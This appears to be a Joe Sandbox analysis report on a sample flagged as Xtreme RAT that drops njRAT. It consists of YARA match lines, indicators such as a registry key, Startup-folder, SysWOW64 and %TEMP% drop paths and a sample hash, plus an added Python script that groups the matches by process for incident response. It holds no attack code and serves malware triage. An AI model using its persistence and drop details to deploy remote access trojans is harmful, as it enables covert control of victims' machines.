                Source: Yara match. File source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE
                Source: Yara match. File source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY
                Source: Yara match. File source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORY
                Source: Yara match. File source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match. File source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                Malicious sample detected (through community Yara rule)
                Source: 7FW4ce2RDy.exe, type: SAMPLE. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 7FW4ce2RDy.exe, type: SAMPLE. Matched rule: Detects XTREME sample analyzed in September 2017. Author: Florian Roth
                Source: 7FW4ce2RDy.exe, type: SAMPLE. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Detects XTREME sample analyzed in September 2017. Author: Florian Roth
                Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Detects XTREME sample analyzed in September 2017. Author: Florian Roth
                Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Detects XTREME sample analyzed in September 2017. Author: Florian Roth
                Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Detects XTREME sample analyzed in September 2017. Author: Florian Roth
                Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Detects XTREME sample analyzed in September 2017. Author: Florian Roth
                Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Detects XTREME sample analyzed in September 2017. Author: Florian Roth
                Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000000.00000000.291223895.0000000010056000.00000008.00020000.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000001.00000002.304153426.0000000010048000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORY. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000001.00000000.293164908.0000000010048000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Detects XTREME sample analyzed in September 2017. Author: Florian Roth
                Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Detects Xtreme RAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Detects XTREME sample analyzed in September 2017. Author: Florian Roth
                Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000000.00000000.291215045.0000000010048000.00000080.00020000.sdmp, type: MEMORY. Matched rule: Xtrem RAT v3.5. Author: Jean-Philippe Teissier / @Jipe_
                Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
                Source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
                Source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED. Matched rule: Identify njRat. Author: Brian Wallace @botnet_hunter
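The match list above (and the full-metadata list of the same rules further down) repeats a handful of rules against dozens of sources, which hides the one finding that matters for triage: the Xtreme RAT rules fire on the submitted file and on svchost.exe (process indices 0 and 1), the njRAT rules fire on 562Server.exe and System.exe (indices 4, 8, 16, 19, 20) and on the dropped files, and process 0 alone matches both families, njRAT only in a runtime dump at a heap address (0.3.7FW4ce2RDy.exe.7a1784.0.unpack). In other words, the Xtreme RAT sample carries the njRAT binary and drops it. The script below is an added example, not part of the Joe Sandbox report; it pivots such lines into a per-process family view. Its reading of the identifiers is an assumption that the report itself bears out: in `<n>.<p>.<image>.<base>.<k>.unpack` the first field is the analysis process index and the third the image name, and in `<n>.<p>.<id>.<base>.<prot>.<type>.sdmp` the first field is the same index in hex (00000014 is process 20, System.exe; 00000004 is process 4, 562Server.exe). The family names and the embedded sample lines are constructed for the example; the lines are copied from the report in both the fused form the page shows ("SAMPLEMatched rule") and the spaced form.

```python
"""Pivot Joe Sandbox 'Matched rule' lines into a per-process malware-family view.

Added example, not from the Joe Sandbox report. Identifier layout assumed:
  <n>.<p>.<image>.<base>.<k>[.raw].unpack   n = process index (decimal)
  <n>.<p>.<id>.<base>.<prot>.<type>.sdmp    n = process index (hex)
"""
import re
from collections import defaultdict

# Constructed input: a subset of the report's lines (fused and spaced forms).
REPORT_LINES = r"""
Source: 7FW4ce2RDy.exe, type: SAMPLEMatched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects XTREME sample analyzed in September 2017 Author: Florian Roth
Source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED. Matched rule: Detects njRAT. Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
""".strip().splitlines()

# Tolerates 'SAMPLEMatched rule', 'SAMPLE Matched rule' and 'SAMPLE. Matched rule'.
LINE_RE = re.compile(
    r"^Source:\s+(?P<source>.+?),\s+type:\s+(?P<type>[A-Z]+?)\.?\s*Matched rule:\s+"
    r"(?P<rule>.+?)(?:\.?\s+Author:\s+(?P<author>.+))?$"
)
UNPACK_RE = re.compile(
    r"^(?P<pidx>\d+)\.(?P<phase>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-fA-F]+)\.\d+(?:\.raw)?\.unpack$"
)
SDMP_RE = re.compile(
    r"^(?P<pidx>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.\d+\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.sdmp$"
)


def family_of(rule: str) -> str:
    """Map rule name or metadata text to a family label (substring match)."""
    text = rule.lower()
    if "xtrem" in text:      # RAT_Xtreme, xtremrat, Xtreme_Sep17_1, "Xtrem RAT v3.5"
        return "XtremeRAT"
    if "njrat" in text:      # RAT_njRat, njrat1, "Detects njRAT", "Identify njRat"
        return "njRAT"
    return "unknown"


def parse_match(line: str):
    """Return a dict for one 'Matched rule' line, or None if the line is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, typ, rule = m["source"], m["type"], m["rule"].strip()
    rec = {"source": src, "type": typ, "rule": rule, "family": family_of(rule),
           "process": None, "phase": None, "image": None, "base": None}
    if typ == "UNPACKEDPE" and (u := UNPACK_RE.match(src)):
        rec.update(process=int(u["pidx"]), phase=int(u["phase"]),
                   image=u["image"], base=int(u["base"], 16))
    elif typ == "MEMORY" and (s := SDMP_RE.match(src)):
        rec.update(process=int(s["pidx"], 16), phase=int(s["phase"], 16),
                   base=int(s["base"], 16))
    return rec


def summarize(lines):
    """Group families by analysis process index, by dropped file and for the sample."""
    processes = defaultdict(lambda: {"images": set(), "families": set(), "phases": set()})
    dropped = defaultdict(set)
    sample = set()
    for line in lines:
        rec = parse_match(line)
        if rec is None:
            continue
        if rec["type"] == "SAMPLE":
            sample.add(rec["family"])
        elif rec["type"] == "DROPPED":
            dropped[rec["source"]].add(rec["family"])
        elif rec["process"] is not None:
            p = processes[rec["process"]]
            p["families"].add(rec["family"])
            p["phases"].add(rec["phase"])
            if rec["image"]:
                p["images"].add(rec["image"])
    return {"sample": sample, "processes": dict(processes), "dropped": dict(dropped)}


def multi_family_processes(summary):
    """Process indices whose memory matched more than one family: the carrier(s)."""
    return sorted(i for i, p in summary["processes"].items() if len(p["families"]) > 1)


if __name__ == "__main__":
    s = summarize(REPORT_LINES)
    print("sample:", sorted(s["sample"]))
    for idx, p in sorted(s["processes"].items()):
        image = ",".join(sorted(p["images"])) or "?"
        print(f"process {idx:>2} {image:<16} {sorted(p['families'])}")
    for path, fams in sorted(s["dropped"].items()):
        print("dropped", path, sorted(fams))
    print("carrier processes:", multi_family_processes(s))
```

Feed it the whole report rather than the subset and the output is the IR shopping list: which process images to hunt for per family, and which dropped paths (the Startup-folder copy, the SysWOW64 drop, the %TEMP% copy) belong to the secondary payload rather than the loader.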
                Installs Xtreme RAT
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe. Key created: HKEY_CURRENT_USER\SOFTWARE\XtremeRAT
                Source: C:\Windows\SysWOW64\svchost.exe. Process created: C:\Windows\SysWOW64\WerFault.exe, command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 564
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe. Code function: 0_2_10048CE7
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe. Code function: 0_2_10048E4D
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe. Code function: 0_2_100486C1
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe. Code function: 0_2_10048F11
                Source: 7FW4ce2RDy.exe. Static PE information: resource name RT_ICON, type GLS_BINARY_LSB_FIRST (four such resources)
                Source: 7FW4ce2RDy.exe. Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
                Source: 7FW4ce2RDy.exe, type: SAMPLE. Matched rule: RAT_Xtreme (date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme)
                Source: 7FW4ce2RDy.exe, type: SAMPLE. Matched rule: Xtreme_Sep17_1 (date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                Source: 7FW4ce2RDy.exe, type: SAMPLE. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_Xtreme (date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme)
                Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Xtreme_Sep17_1 (date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                Source: 0.2.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: RAT_Xtreme (date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme)
                Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: Xtreme_Sep17_1 (date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                Source: 1.2.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_Xtreme (date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme)
                Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Xtreme_Sep17_1 (date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                Source: 1.0.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_Xtreme (date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme)
                Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: Xtreme_Sep17_1 (date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                Source: 1.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE. Matched rule: xtremrat (date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0)
                Source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
                Source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE. Matched rule: njrat1 (date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net)
                Source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE. Matched rule: RAT_njRat (date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat)
